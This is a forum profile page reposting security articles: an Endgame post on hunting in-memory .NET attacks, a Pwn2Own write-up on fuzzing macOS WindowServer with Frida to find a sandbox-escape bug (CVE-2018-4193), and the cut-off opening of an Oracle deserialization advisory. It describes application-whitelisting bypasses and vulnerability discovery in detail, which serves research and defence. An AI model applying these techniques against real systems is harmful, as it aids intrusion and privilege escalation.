Everything posted by Nytro

  1. Hunting for In-Memory .NET Attacks

Joe Desimone, October 10, 2017

In past blog posts, we shared our approach to hunting for traditional in-memory attacks along with in-depth analysis of many injection techniques. As a follow-up to my DerbyCon presentation, this post will investigate an emerging trend of adversaries using .NET-based in-memory techniques to evade detection. I'll discuss both eventing (real-time) and on-demand detection strategies for these .NET techniques. At Endgame, we understand that these differing approaches to detection and prevention are complementary, and together result in the most robust defense against in-memory attacks.

The .NET Allure

.NET in-memory techniques, and even standard .NET applications, are attractive to adversaries for several reasons. First and foremost, the .NET framework comes pre-installed in all Windows versions. This is important as it enables the attackers' malware to have maximum compatibility across victims. Next, the .NET PE metadata format itself is fairly complicated. Due to resource constraints, many endpoint security vendors have limited insight into the managed (.NET) structures of these applications beyond what is shared with vanilla, unmanaged (non-.NET) applications. In other words, most AVs and security products don't defend well against malicious .NET code, and adversaries know it. Finally, the .NET framework has built-in functionality to dynamically load memory-only modules through the Assembly.Load(byte[]) function (and its various overloads). This function allows attackers to easily craft crypters/loaders, keep their payloads off disk, and even bypass application whitelisting solutions like Device Guard. This post focuses on the Assembly.Load function due to the robust set of attacker capabilities it supports.

.NET Attacker Techniques

Adversaries leveraging .NET in-memory techniques is not completely new.
However, in the last six months there has been a noticeable uptick in tradecraft, which I'll briefly discuss to illustrate the danger.

For instance, in 2014, DEEP PANDA, a threat group suspected of operating out of China, was observed using the multi-stage MadHatter implant, which is written in .NET. More interestingly, this implant exists only in memory after a multi-stage Assembly.Load bootstrapping process that begins with PowerShell. PowerShell can directly call .NET methods, with the Assembly.Load function being no exception. It is as easy as calling [System.Reflection.Assembly]::Load($bin).

More recently, the OilRig APT group used a packed .NET malware sample known as ISMInjector to evade signature-based detection. During the unpacking routine, the sample uses the Assembly.Load function to access the embedded next-stage malware known as ISMAgent.

A third example, more familiar to red teams, is ReflectivePick by Justin Warner and Lee Christensen. ReflectivePick allows PowerShell Empire to inject and bootstrap PowerShell into any running process. It leverages the Assembly.Load() method to load their PowerShell runner DLL without dropping it to disk. The image below shows the relevant source code of their tool.

It is important to point out that Assembly.Load, being a core function of the .NET framework, is often used in legitimate programs. This includes built-in Microsoft applications, which has led to an interesting string of defense evasion and application whitelisting bypasses. For example, Matt Graeber discovered a Device Guard bypass that targets a race condition to hijack legitimate calls to Assembly.Load, allowing an attacker to execute any unsigned .NET code on a Device Guard protected host. Because of the difficulty of fixing such a technique, Microsoft has currently decided not to service this issue, leaving attackers a convenient "forever-day exploit" against hosts that are hardened with application whitelisting.
Casey Smith has also published a ton of research on bypassing application whitelisting solutions. A number of these techniques, at their core, target signed Microsoft applications that call the Assembly.Load method with attacker-supplied code. One example is MSBuild, which comes pre-installed on Windows and allows attackers to execute unsigned .NET code inside a legitimate, signed Microsoft process. These techniques are not JUST useful to attackers who are targeting application whitelisting protected environments. Since they allow attacker code to be loaded into legitimate signed processes in an unconventional manner, most anti-virus and EDR products are blind to the attacker activity and can be bypassed.

Finally, James Forshaw developed the DotNetToJScript technique. At its heart, this technique leverages the BinaryFormatter deserialization method to load a .NET application using only JScript. Interestingly enough, under the hood the technique makes a call to the Assembly.Load method. DotNetToJScript opened the door for many new clever techniques for executing unsigned .NET code in a stealthy manner. For example, James demonstrated how to combine DotNetToJScript with COM hijacking and Casey's squiblydoo technique to inject code into protected processes. In another example, Casey weaponized DotNetToJScript in universal.js to execute arbitrary shellcode or PowerShell commands.

The number of Microsoft-signed applications that can be abused to execute attacker code in a stealthy manner is dizzying. Fortunately, the community has been quick to document and track them publicly in a number of places. One good reference is Oddvar Moe's UltimateAppLockerByPassList, and another is Microsoft's own reference.

Detecting .NET Attacks

As these examples illustrate, attackers are leveraging .NET in various ways to defeat and evade endpoint detection. Now, let's explore two approaches to detecting these attacks: on-demand and real-time (eventing-based) techniques.
On-Demand Detection

On-demand detection leverages snapshot-in-time data collection. You don't need a persistent agent running and collecting data when the attack takes place, but you do need the malicious code running during the hunt/collection time. The trick is to focus on high-value data that can capture actor-agnostic techniques and has a high signal-to-noise ratio. One example is the Get-InjectedThread script for detecting traditional unmanaged in-memory injection techniques.

To demonstrate detecting .NET malware usage of the Assembly.Load function, I leverage PowerShell Empire by Will Schroeder and others. Empire allows you to inject an agent into any process by remotely bootstrapping PowerShell. As you see below, after injection calc.exe has loaded the PowerShell core library System.Management.Automation.ni.dll. This fact alone can be interesting, but a surprisingly large number of legitimate applications load PowerShell. Combining this with process network activity and looking for outliers across all your data may give you better mileage.

Upon deeper inspection, we see something even more interesting. As shown below, memory section 0x2710000 contains a full .NET module (PE header present). The characteristics of the memory region are a bit unusual. The type is MEM_MAPPED, although there is no associated file-mapping object (note the "Use" field is empty in Process Hacker). Lastly, the region has a protection of PAGE_READWRITE, which, surprisingly, is not executable. These memory characteristics are a side effect of loading a memory-only module with the Assembly.Load(byte[]) method.

To automate this type of hunt, I wrote a PowerShell function called Get-ClrReflection, which looks for this combination of memory characteristics and will save any hits for further analysis. Below is sample output after running it against a workstation that was infected with Empire.
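The memory heuristic described above is language-agnostic, so it can be sketched compactly. The snippet below is a minimal illustration of the detection logic only (the region fields and sample values are invented for the example; it is not Get-ClrReflection's actual implementation):

```python
# Heuristic from the text: a memory-only .NET module loaded via
# Assembly.Load(byte[]) tends to appear as a MEM_MAPPED region with no
# backing file-mapping object, PAGE_READWRITE (non-executable)
# protection, and a PE header ("MZ") at the start of its contents.

def looks_like_clr_reflection(region):
    """region: dict describing one memory region of a process."""
    return (
        region["type"] == "MEM_MAPPED"
        and region["mapped_file"] is None          # no file-mapping object
        and region["protect"] == "PAGE_READWRITE"  # surprisingly not executable
        and region["data"][:2] == b"MZ"            # PE header present
    )

suspect = {
    "type": "MEM_MAPPED",
    "mapped_file": None,
    "protect": "PAGE_READWRITE",
    "data": b"MZ\x90\x00" + b"\x00" * 60,
}
benign = {
    "type": "MEM_IMAGE",
    "mapped_file": r"C:\Windows\System32\kernel32.dll",
    "protect": "PAGE_EXECUTE_READ",
    "data": b"MZ\x90\x00",
}

print(looks_like_clr_reflection(suspect))  # True
print(looks_like_clr_reflection(benign))   # False
```

In a real hunt, the region data would come from an API such as VirtualQueryEx/ReadProcessMemory; here it is stubbed out so only the classification logic remains.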
Once again, you will see hits for legitimate applications that leverage the Assembly.Load function. One common false positive is for XmlSerializer-generated assemblies. Standard hunt practices apply. Bucket your hits by process name, or better yet with a fuzzy hash match. For example, ClrGuard (details next) will give you a TypeRef hash with the "-f" switch. Below is an example from Empire.

Eventing-Based Detection

Eventing-based detection is great because you won't need the luck of an adversary being active while you are hunting. It also gives you an opportunity to prevent attacker techniques in real time. To provide signals into the CLR on which .NET runs, we developed and released ClrGuard. ClrGuard hooks into all .NET processes on the system. From there, it performs an in-line hook of the native LoadImage() function, which is what Assembly.Load() calls under the CLR hood. When events are observed, they are sent over a named pipe to a monitoring process for further introspection and a mitigation decision. For example, Empire's psinject function can be immediately detected and blocked in real time, as shown in the image below. In a similar manner, OilRig's ISMInjector can be quickly detected and blocked. Another example below shows ClrGuard in action against Casey Smith's universal.js tool.

While we don't recommend you run ClrGuard across your enterprise (it is proof-of-concept grade), we hope it spurs community discussion and innovation against these types of .NET attacks. These sorts of defensive techniques power protection across the Endgame product, and an enterprise-grade ClrGuard-like feature will be coming soon.

Conclusion

It is important to thank those doing great offensive security research who are willing to publish their capabilities and tradecraft for the greater good of the community. The recent advancements in .NET in-memory attacks have shown that it is time for defenders to up their game and go toe-to-toe with the more advanced red teams and adversaries.
We hope that ClrGuard and Get-ClrReflection help balance the stakes. These tools can increase a defender's optics into .NET malware activities and raise visibility into this latest evolution of attacker techniques.

Sursa: https://www.endgame.com/blog/technical-blog/hunting-memory-net-attacks
  2. Cracking the Walls of the Safari Sandbox

Fuzzing the macOS WindowServer for Exploitable Vulnerabilities

July 25, 2018 / Patrick Biernat & Markus Gaasedelen

When exploiting real-world software or devices, achieving arbitrary code execution on a system may only be the first step towards total compromise. For high-value or security-conscious targets, remote code execution is often succeeded by a sandbox escape (or a privilege escalation) and persistence. Each of these stages usually requires its own entirely unique exploit, making some weaponized zero-days a 'chain' of exploits.

Considered high-risk consumer software, modern web browsers use software sandboxes to contain damage in the event of remote compromise. Having exploited Apple Safari in the previous post, we turn our focus towards escaping the Safari sandbox on macOS in an effort to achieve total system compromise.

Using Frida to fuzz the macOS WindowServer from the lock screen

As the fifth blog post of our Pwn2Own series, we will discuss our experience evaluating the Safari sandbox on macOS for security vulnerabilities. We will select a software component exposed to the sandbox, and utilize Frida to build an in-process fuzzer as a means of discovering exploitable vulnerabilities.

Software Sandboxes

Software sandboxing is often accomplished by restricting the runtime privileges of an application through platform-dependent security features provided by the operating system. When layered appropriately, these security controls can limit the application's ability to communicate with the broader system (syscall filtering, service ACLs), prevent it from reading/writing files on disk, and block external resources (networking). Tailored to a specific application, a sandbox will aggressively reduce the system's exposure to a potentially malicious process, preventing the process from making persistent changes to the machine.
As an example, a compromised but sandboxed application cannot hold user files on disk for ransom if the process was not permitted filesystem access.

A diagram of the old Adobe Reader Protected Mode Sandbox, circa 2010

Over the past several years we have seen sandboxes grow notably more secure in isolating problematic software. This has brought about discussion regarding the value of a theoretically perfect software sandbox: when properly contained, does it really matter if an attacker can gain arbitrary code execution on a machine? The answer to this question has been hotly debated amongst security researchers. This discussion has been further aggravated by the contrasting approaches to browser security taken by Microsoft Edge versus Google Chrome. Where one leads with in-process exploit mitigations (Edge), the other is a poster child for isolation technology (Chrome).

As a simple barometer, the Pwn2Own results over the past several years seem to indicate that sandboxing is winning when put toe-to-toe against advanced in-process mitigations. There are countless opinions on why this may be the case, and on whether this trend holds true for the real world. To state it plainly, as attackers we do think that sandboxes (when done right) add considerable value towards securing software. More importantly, this is an opinion shared by many familiar with attacking these products.

THE (MEMORY CORRUPTION) SAFETY DANCE (13:25) at SAS 2017, by Mark Dowd

However, as technology improves and gives way to mitigations such as strict control flow integrity (CFI), these views may change. The recent revelations wrought by Meltdown & Spectre are a great example of this, putting cracks into even the theoretically perfect sandbox. At the end of the day, both sandboxing and mitigation technologies will continue to improve and evolve. They are not mutually exclusive of each other, and both play an important role towards raising the costs of exploitation in different ways.
macOS Sandbox Profiles

On macOS, there is a powerful low-level sandboxing technology called 'Seatbelt', which Apple has (publicly) deprecated in favor of the higher-level 'App Sandbox'. With little-to-no official documentation available, information on how to use the former system sandbox has been learned through reverse engineering efforts by the community (1, 2, 3, 4, 5, ...).

To be brief, the walls of Seatbelt-based macOS sandboxes are built using rules that are defined in a human-readable sandbox profile. A few of these sandbox profiles live on disk, and can be seen tailored to the specific needs of their respective applications. For the Safari browser, its sandbox profile is composed of the following two files (locations may vary):

/System/Library/Sandbox/Profiles/system.sb
/System/Library/StagedFrameworks/Safari/WebKit.framework/Versions/A/Resources/com.apple.WebProcess.sb

The macOS sandbox profiles are written in a language called TinyScheme. Profiles are often written as a whitelist of actions or services required by the application, disallowing access to much of the broader system by default:

...
(version 1)
(deny default (with partial-symbolication))
(allow system-audit file-read-metadata)
(import "system.sb")

;;; process-info* defaults to allow; deny it and then allow operations we actually need.
(deny process-info*)
(allow process-info-pidinfo)
...

For example, the sandbox profile can whitelist explicit directories or files that the sandboxed application should be permitted to access. Here is a snippet from the WebProcess.sb profile, allowing Safari read-only access to certain directories that store user preferences on disk:

...
;; Read-only preferences and data
(allow file-read*
    ;; Basic system paths
    (subpath "/Library/Dictionaries")
    (subpath "/Library/Fonts")
    (subpath "/Library/Frameworks")
    (subpath "/Library/Managed Preferences")
    (subpath "/Library/Speech/Synthesizers")
...
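Because the profiles are plain s-expressions, pulling out the whitelisted resources for attack-surface enumeration is mechanical. Below is a toy Python extractor (a rough sketch for illustration, not a real TinyScheme parser; the embedded profile text is abbreviated from the snippets above):

```python
import re

profile = """
(deny default)
(allow file-read*
    (subpath "/Library/Dictionaries")
    (subpath "/Library/Fonts"))
(allow mach-lookup
    (global-name "com.apple.windowserver.active"))
"""

def allowed_resources(text):
    """Collect every quoted string inside an (allow ...) form."""
    out = []
    for m in re.finditer(r"\(allow\b", text):
        # walk forward until the parens of this form balance out
        depth, i = 0, m.start()
        while i < len(text):
            if text[i] == "(":
                depth += 1
            elif text[i] == ")":
                depth -= 1
                if depth == 0:
                    break
            i += 1
        out += re.findall(r'"([^"]+)"', text[m.start():i])
    return out

print(allowed_resources(profile))
# ['/Library/Dictionaries', '/Library/Fonts', 'com.apple.windowserver.active']
```

A quick pass like this over system.sb and WebProcess.sb gives a checklist of reachable files, mach services, and IOKit classes to probe.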
Serving almost like horse blinders, sandbox profiles help focus our attention (as attackers) by listing exactly which non-sandboxed resources we can interface with on the system. This helps enumerate the relevant attack surface that can be probed for security defects.

Escaping Sandboxes

In practice, sandbox escapes are often their own standalone exploit. This means that an exploit to escape the browser sandbox is almost always entirely unique from the exploit used to achieve initial remote code execution. When escaping software sandboxes, it is common to attack code that executes outside of the sandboxed process. By exploiting the kernel or an application (such as a system service) running outside the sandbox, a skilled attacker can pivot into an execution context where there is no sandbox.

The Safari sandbox policy explicitly whitelists a number of external software attack surfaces. As an example, the policy snippet below highlights a number of IOKit interfaces which can be accessed from the sandbox. This is because they expose system controls that are required by certain features in the browser.

...
;; IOKit user clients
(allow iokit-open
    (iokit-user-client-class "AppleMultitouchDeviceUserClient")
    (iokit-user-client-class "AppleUpstreamUserClient")
    (iokit-user-client-class "IOHIDParamUserClient")
    (iokit-user-client-class "RootDomainUserClient")
    (iokit-user-client-class "IOAudioControlUserClient")
...

Throughout the profile, entries that begin with iokit-* refer to functionality we can invoke via the IOKit framework. These are the userland client interfaces that one can use to communicate with their relevant kernel counterparts (kexts). Another interesting class of rules defined in the sandbox profile falls under allow mach-lookup:

...
;; Remote Web Inspector
(allow mach-lookup
    (global-name "com.apple.webinspector"))

;; Various services required by AppKit and other frameworks
(allow mach-lookup
    (global-name "com.apple.FileCoordination")
    (global-name "com.apple.FontObjectsServer")
    (global-name "com.apple.PowerManagement.control")
    (global-name "com.apple.SystemConfiguration.configd")
    (global-name "com.apple.SystemConfiguration.PPPController")
    (global-name "com.apple.audio.SystemSoundServer-OSX")
    (global-name "com.apple.analyticsd")
    (global-name "com.apple.audio.audiohald")
...

The allow mach-lookup keyword depicted above is used to permit the sandboxed application access to various remote procedure call (RPC)-like servers hosted within system services. These policy definitions allow our application to communicate with the whitelisted RPC servers over mach IPC. Additionally, there are some explicitly whitelisted XPC services:

...
(deny mach-lookup (xpc-service-name-prefix ""))
(allow mach-lookup
    (xpc-service-name "com.apple.accessibility.mediaaccessibilityd")
    (xpc-service-name "com.apple.audio.SandboxHelper")
    (xpc-service-name "com.apple.coremedia.videodecoder")
    (xpc-service-name "com.apple.coremedia.videoencoder")
...

XPC is a higher-level IPC mechanism used to facilitate communication between processes, again built on top of mach IPC. XPC is fairly well documented, with a wealth of resources and security research available for it online (1, 2, 3, 4, ...).

There are a few other interesting avenues for attacking non-sandboxed code, including making syscalls directly to the XNU kernel, or going through IOCTLs. We did not spend any time looking at these surfaces due to time constraints. Our evaluation of the sandbox was brief, so our knowledge and insight only extend so far. A more interesting exercise for the future would be to enumerate attack surface that currently cannot be restrained by sandbox policies.
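Read as policy logic, the XPC rules quoted above amount to default-deny with a short explicit allow-list: the deny on the empty name prefix matches every service, and only the named services are re-allowed. A Python sketch of those semantics (an illustration of the rule interaction, not how Seatbelt actually evaluates profiles):

```python
# (deny mach-lookup (xpc-service-name-prefix "")) matches *every* XPC
# service name, so a lookup succeeds only for the explicitly allowed ones.
ALLOWED_XPC = {
    "com.apple.accessibility.mediaaccessibilityd",
    "com.apple.audio.SandboxHelper",
    "com.apple.coremedia.videodecoder",
    "com.apple.coremedia.videoencoder",
}

def xpc_lookup_allowed(name):
    # everything not re-allowed falls through to the deny-prefix rule
    return name in ALLOWED_XPC

print(xpc_lookup_allowed("com.apple.coremedia.videodecoder"))  # True
print(xpc_lookup_allowed("com.apple.nsurlsessiond"))           # False
```

The allow-list is thus also an attacker's worklist: each allowed name is a non-sandboxed service whose message handling can be probed.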
Target Selection

Having surveyed some of the components exposed to the Safari sandbox, the next step was to decide what we felt would be the easiest to target as a means of escape.

Attacking components that live in the macOS kernel is attractive: successful exploitation guarantees not only a sandbox escape, but also unrestricted ring-zero code execution. With the introduction of 'rootless' in macOS 10.11 (El Capitan), a kernel-mode privilege escalation is necessary to do things such as loading unsigned drivers without disabling SIP. The cons of attacking kernel code come at the cost of debuggability and convenience. Tooling to debug or instrument kernel code is primitive, poorly documented, or largely non-existent. Reproducing bugs, analyzing crashes, or stabilizing an exploit often requires a full system reboot, which can be taxing on time and morale.

After weighing these traits and reviewing public research on past Safari sandbox escapes, we zeroed in on the WindowServer: a complex usermode system service that is accessible to the Safari sandbox over mach IPC:

(allow mach-lookup
    ...
    (global-name "com.apple.windowserver.active")
    ...
)

For our purposes, WindowServer appeared to be nearly an ideal target:

  • Nearly every process can communicate with it (Safari included)
  • It lives in userland, simplifying debugging and introspection
  • It runs with permissions essentially equivalent to root
  • It has a relatively large attack surface
  • It has a notable history of security vulnerabilities

WindowServer is a closed-source, private framework (a library), which implies developers are not meant to interface with it directly. This also means that official documentation is non-existent, and what little information is available publicly is thin, dated, or simply incomplete.

WindowServer Attack Surface

WindowServer works by processing incoming mach messages from applications running on the system. On macOS, mach messages are a form of IPC that enables communication between running processes.
Mach IPC is generally used by system services to expose an RPC interface for other applications to call into. Under the hood, virtually every GUI macOS application transparently communicates with the WindowServer. As hinted by its name, the WindowServer system service is responsible for actually drawing application windows to the screen. A running application will tell the WindowServer (via RPC) what size or shape to make a window, and where to put it:

The WindowServer renders virtually all desktop applications on macOS

For those familiar with Microsoft Windows, the macOS WindowServer is a bit like a usermode Win32k, albeit less complex. It is also responsible for drawing the mouse cursor, managing hotkeys, and facilitating some cross-process communication (among many other things).

Applications can interface with the WindowServer over mach IPC to reach some 600 RPC-like functions. When the privileged WindowServer system service receives a mach message, the message will be routed to its respective message handler (a 'remote procedure'), coupled with foreign data to be parsed by the handler function.

A selection of WindowServer mach message handlers

As an attacker, these functions prefixed with _X... (such as _XBindSurface) represent directly accessible attack surface. From the Safari sandbox, we can send arbitrary mach messages (data) to the WindowServer targeting any of these functions. If we can find a vulnerability in one of these functions, we may be able to exploit the service. We found that these 600-some handler functions are split among three MIG-generated mach subsystems within the WindowServer.
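The routing scheme just described, a per-subsystem table mapping message ids to _X... handlers, can be sketched as follows. The handler names mirror the convention from the text, but the ids, message layout, and handler bodies are invented for illustration:

```python
# MIG-style dispatch sketch: the dispatcher reads the message id from
# the header and forwards the body to the matching handler.

def _XRegisterForKey(body):
    return ("RegisterForKey", body)

def _XBindSurface(body):
    return ("BindSurface", body)

# one subsystem's id -> handler table (ids are made up)
SUBSYSTEM = {
    0x732F: _XRegisterForKey,
    0x7235: _XBindSurface,
}

def dispatch(msg):
    handler = SUBSYSTEM.get(msg["msgh_id"])
    if handler is None:
        raise KeyError("no handler for id %#x" % msg["msgh_id"])
    # the body is foreign, attacker-controllable data: each handler
    # must parse it safely, which is exactly where bugs hide
    return handler(msg["buffer"])

print(dispatch({"msgh_id": 0x7235, "buffer": b"\x00" * 12})[0])  # BindSurface
```

The value of this structure to a fuzzer is that a single hook at the dispatch point observes traffic destined for every handler in the table.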
Each subsystem has its own message dispatch routine which initially parses the header of the incoming mach message and then passes the message-specific data on to its appropriate handler via an indirect call:

RAX is a code pointer to a message handler function that is selected based on the incoming message id

The three dispatch subsystems make for an ideal place to fuzz the WindowServer in-process using dynamic binary instrumentation (DBI). They represent a generic 'last hop' for incoming data before it is delivered to any of the ~600 individual message handlers. Without having to reverse engineer any of these surface-level functions or their unique message formats (input), we had discovered a low-cost avenue to begin automated vulnerability discovery. By instrumenting these chokepoints, we could fuzz all incoming WindowServer traffic that can be generated through normal user interaction with the system.

In-process Fuzzing With Frida

Frida is a DBI framework that injects a JavaScript interpreter into a target process, enabling blackbox instrumentation via user-provided scripts. This may sound like a bizarre use of JavaScript, but this model allows for rapid prototyping of near-limitless binary introspection against compiled applications.

We started our Frida fuzzing script by defining a small table for the instructions we wished to hook at runtime. Each of these instructions was an indirect call (e.g., call rax) within the dispatch routines covered in the previous section.

// instructions to hook (offset from base, reg w/ call target)
var targets = [
    ['0x1B5CA2', 'rax'], // WindowServer_subsystem
    ['0x2C58B',  'rcx'], // Renezvous_subsystem
    ['0x1B8103', 'rax']  // Services_subsystem
]

The JavaScript API provided by Frida is packed with functionality that allows one to snoop on or modify the process at runtime. Using the Interceptor API, it is possible to hook individual instructions as a place to stop and introspect the process.
The basis for our hooking code is provided below:

function InstallProbe(probe_address, target_register) {
    var probe = Interceptor.attach(probe_address, function(args) {
        var input_msg  = args[0]; // rdi (the incoming mach_msg)
        var output_msg = args[1]; // rsi (the response mach_msg)

        // extract the call target & its symbol name (_X...)
        var call_target = this.context[target_register];
        var call_target_name = DebugSymbol.fromAddress(call_target);

        // ready to read / modify / replay
        console.log('[+] Message received for ' + call_target_name);
        // ...
    });
    return probe;
}

To hook the instructions we defined earlier, we first resolved the base address of the private SkyLight framework that they reside in. We are then able to compute the virtual addresses of the target instructions at runtime using the module base + offset. After that, it is as simple as installing the interceptors on these addresses:

// locate the runtime address of the SkyLight framework
var skylight = Module.findBaseAddress('SkyLight');
console.log('[*] SkyLight @ ' + skylight);

// hook the target instructions
for (var i in targets) {
    var hook_address = ptr(skylight).add(targets[i][0]); // base + offset
    InstallProbe(hook_address, targets[i][1])
    console.log('[+] Hooked dispatch @ ' + hook_address);
}

With the message intercepts installed, we now had the ability to record, modify, or replay mach message contents just before they are passed into their underlying message handler (an _X... function). This effectively allowed us to man-in-the-middle any mach traffic to these MIG subsystems and dump its contents at runtime:

Using Frida to sniff incoming mach messages received by the WindowServer

From this point, our fuzzing strategy was simple. We used our hooks to flip random bits (dumb fuzzing) in any incoming messages received by the WindowServer. Simultaneously, we recorded the bitflips injected by our fuzzer to create 'replay' log files.
Replaying the recorded bitflips in a fresh instance of WindowServer gave us some degree of reproducibility for any crashes produced by our fuzzer. The ability to consistently reproduce a crash is priceless when trying to identify the underlying bug. A sample snippet of a bitflip replay log looked like the following:

...
{"msgh_bits":"0x1100","msgh_id":"0x7235","buffer":"000000001100000001f65342","flip_offset":[4],"flip_mask":[16]}
{"msgh_bits":"0x1100","msgh_id":"0x723b","buffer":"00000000010000000900000038a1b63e00000000"}
{"msgh_bits":"0x80001112","msgh_id":"0x732f","buffer":"0000008002000000ffffff7f","ool_bits":"0x1000101","desc_count":1}
{"msgh_bits":"0x1100","msgh_id":"0x723b","buffer":"00000000010000000900000070f3a53e00000000","flip_offset":[12],"flip_mask":[2]}
{"msgh_bits":"0x80001100","msgh_id":"0x722a","buffer":"0000008002000000dfffff7f","ool_bits":"0x1000101","desc_count":1,"flip_offset":[8],"flip_mask":[32]}
...

For the fuzzer to be effective, the final step required us to stimulate the system into generating WindowServer message 'traffic'. This could have been accomplished any number of ways, such as letting a user navigate around the system, or writing scripts to randomly open applications and move them around. But through careful study of pop culture and past vulnerabilities, we decided to simply place a weight on the 'Enter' key:

'Advanced Persistent Threat'

On the macOS lock screen, holding 'Enter' happens to generate a reasonable variety of message traffic to the WindowServer. When a crash occurred as a result of our bitflipping, we saved the replay log and crash state to disk. Conveniently, when WindowServer crashes, macOS locks the machine and restarts the service... bringing us back to the lock screen. A simple Python script running in the background sees the new WindowServer instance pop up and injects Frida to start the next round of fuzzing.
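The record-and-replay mutation scheme can be sketched in a few lines of Python. The field names mirror the log snippet above; everything else (the helper names, the sample message) is illustrative rather than the fuzzer's actual code:

```python
import json
import random

def fuzz_one(msg, rng):
    """Flip one random bit in the message buffer.

    Returns the mutated buffer (what would be handed to the handler)
    and a JSON replay-log line recording the ORIGINAL buffer plus the
    (offset, mask) of the flip, so the mutation can be re-applied later.
    """
    buf = bytearray(bytes.fromhex(msg["buffer"]))
    off = rng.randrange(len(buf))
    mask = 1 << rng.randrange(8)
    buf[off] ^= mask
    log_line = json.dumps(dict(msg, flip_offset=[off], flip_mask=[mask]))
    return bytes(buf), log_line

def replay(log_line):
    """Re-apply a recorded bitflip to the logged (original) buffer."""
    entry = json.loads(log_line)
    buf = bytearray(bytes.fromhex(entry["buffer"]))
    for off, mask in zip(entry.get("flip_offset", []), entry.get("flip_mask", [])):
        buf[off] ^= mask
    return bytes(buf)

msg = {"msgh_id": "0x723b", "buffer": "00000000010000000900000038a1b63e"}
mutated, line = fuzz_one(msg, random.Random(1))
assert replay(line) == mutated  # the log faithfully reproduces the mutation
```

Logging the original buffer (rather than the mutated one) is what makes replay lines without flip_offset/flip_mask meaningful: they are unmutated traffic that still gets re-sent to preserve the session state leading up to the crash.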
This was the lowest-effort and lowest-cost fuzzer we could have made for this target, yet it still proved fruitful.

Discovery & Root Cause Analysis

Left to run overnight, the fuzzer produced a number of unique (mostly useless) crashes. Among the handful of more interesting crashes was one that looked particularly promising but would require additional investigation. We replayed the bitflip log for that crash against a new instance of WindowServer with lldb (the default macOS debugger) attached and were able to reproduce the issue. The crashing instruction and register state depicted what looked like an out-of-bounds read:

Process 77180 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (address=0x7fd68940f7d8)
    frame #0: 0x00007fff55c6f677 SkyLight`_CGXRegisterForKey + 214
SkyLight`_CGXRegisterForKey:
->  0x7fff55c6f677 <+214>: mov  rax, qword ptr [rcx + 8*r13 + 0x8]
    0x7fff55c6f67c <+219>: test rax, rax
    0x7fff55c6f67f <+222>: je   0x7fff55c6f6e9 ; <+328>
    0x7fff55c6f681 <+224>: xor  ecx, ecx
Target 0: (WindowServer) stopped.

In the crashing context, r13 appeared to be totally invalid (very large). Another attractive aspect of this crash was its proximity to a top-level _X... function. The shallow nature of this crash implied that we would likely have direct control over the malformed field that caused it.
(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (address=0x7fd68940f7d8)
  * frame #0: 0x00007fff55c6f677 SkyLight`_CGXRegisterForKey + 214
    frame #1: 0x00007fff55c28fae SkyLight`_XRegisterForKey + 40
    frame #2: 0x00007ffee2577232
    frame #3: 0x00007fff55df7a57 SkyLight`CGXHandleMessage + 107
    frame #4: 0x00007fff55da43bf SkyLight`connectionHandler + 212
    frame #5: 0x00007fff55e37f21 SkyLight`post_port_data + 235
    frame #6: 0x00007fff55e37bfd SkyLight`run_one_server_pass + 949
    frame #7: 0x00007fff55e377d3 SkyLight`CGXRunOneServicesPass + 460
    frame #8: 0x00007fff55e382b9 SkyLight`SLXServer + 832
    frame #9: 0x0000000109682dde WindowServer`_mh_execute_header + 3550
    frame #10: 0x00007fff5bc38115 libdyld.dylib`start + 1
    frame #11: 0x00007fff5bc38115 libdyld.dylib`start + 1

Root cause analysis to identify the bug responsible for this crash took only minutes. Directly prior to the crash was a signed/unsigned comparison issue within _CGXRegisterForKey(...):

Signed comparison vulnerability in WindowServer

WindowServer tries to ensure that the user-controlled index parameter is six or less. However, this check is implemented as a signed-integer comparison. This means that supplying a negative number of any size (e.g., -100000) will incorrectly get us past the check. Our 'fuzzed' index was a 32-bit field in the mach message for _XRegisterForKey(...).
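The flaw is easy to demonstrate outside of assembly. A minimal Python sketch of the broken bounds check (ctypes reinterprets the 32-bit field the way the compiled signed comparison does; the function names are ours, not WindowServer's):

```python
import ctypes

def flawed_check(index_u32):
    """Mimic the compiled check: compare the 32-bit field as *signed*."""
    signed = ctypes.c_int32(index_u32).value  # reinterpret top-bit-set values as negative
    return signed <= 6                        # 'index must be six or less'

def correct_check(index_u32):
    """What the check should do: compare as unsigned."""
    return (index_u32 & 0xFFFFFFFF) <= 6

print(flawed_check(0x00000005))   # True  -- legitimate index
print(flawed_check(0x00000064))   # False -- 100 is rejected
print(flawed_check(0x80000005))   # True  -- -2147483643 sneaks past the check
print(correct_check(0x80000005))  # False -- unsigned comparison rejects it
```

Any value with the top bit set reads as a huge negative number, so it passes the signed "<= 6" test while indexing far outside the intended array.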
The bit our fuzzer flipped happened to be the uppermost bit, changing the number to a massive negative value:

        HEX        | BINARY                           | DECIMAL
        -----------+----------------------------------+-------------
BEFORE: 0x00000005 | 00000000000000000000000000000101 | 5
AFTER:  0x80000005 | 10000000000000000000000000000101 | -2147483643
                     ^
                     |- Corrupted bit

Assuming we can get the currently crashing read to succeed through careful indexing to valid memory, there are a few minor constraints between us and what looks like an exploitable write later in the function:

A write of unknown values (r15, ecx) can occur at the attacker-controlled out-of-bounds index

Under the right conditions, this bug appears to be an out-of-bounds write! Any vulnerability that allows for memory corruption (a write) is generally categorized as an exploitable condition (until proven otherwise). This vulnerability has since been fixed as CVE-2018-4193. In the next post, we provide a standalone PoC to trigger this crash and detail the constraints that make this bug rather difficult to exploit while developing our full Safari sandbox escape against the WindowServer.

Conclusion

Escaping a software sandbox is a necessary step towards total system compromise when exploiting modern browsers. We used this post to discuss the value of sandboxing technology, the standard methodology for escaping one, and our approach towards evaluating the Safari sandbox for a means of escape. By reviewing existing resources, we devised a strategy to tackle the Safari sandbox and fuzz a historically problematic component (the WindowServer) with a very simple in-process fuzzer. Our process demonstrates nothing novel; even contrived fuzzers are still able to find critical, real-world bugs.

Sursa: http://blog.ret2.io/2018/07/25/pwn2own-2018-safari-sandbox/
  3. Wednesday, July 18, 2018

Oracle Privilege Escalation via Deserialization

TLDR: Oracle Database is vulnerable to user privilege escalation via a Java deserialization vector that bypasses the built-in Oracle JVM security. Proper exploitation can allow an attacker to gain shell-level access on the server and SYS-level access to the database. Oracle has opened CVE-2018-3004 for this issue.

Deserialization Vulnerabilities

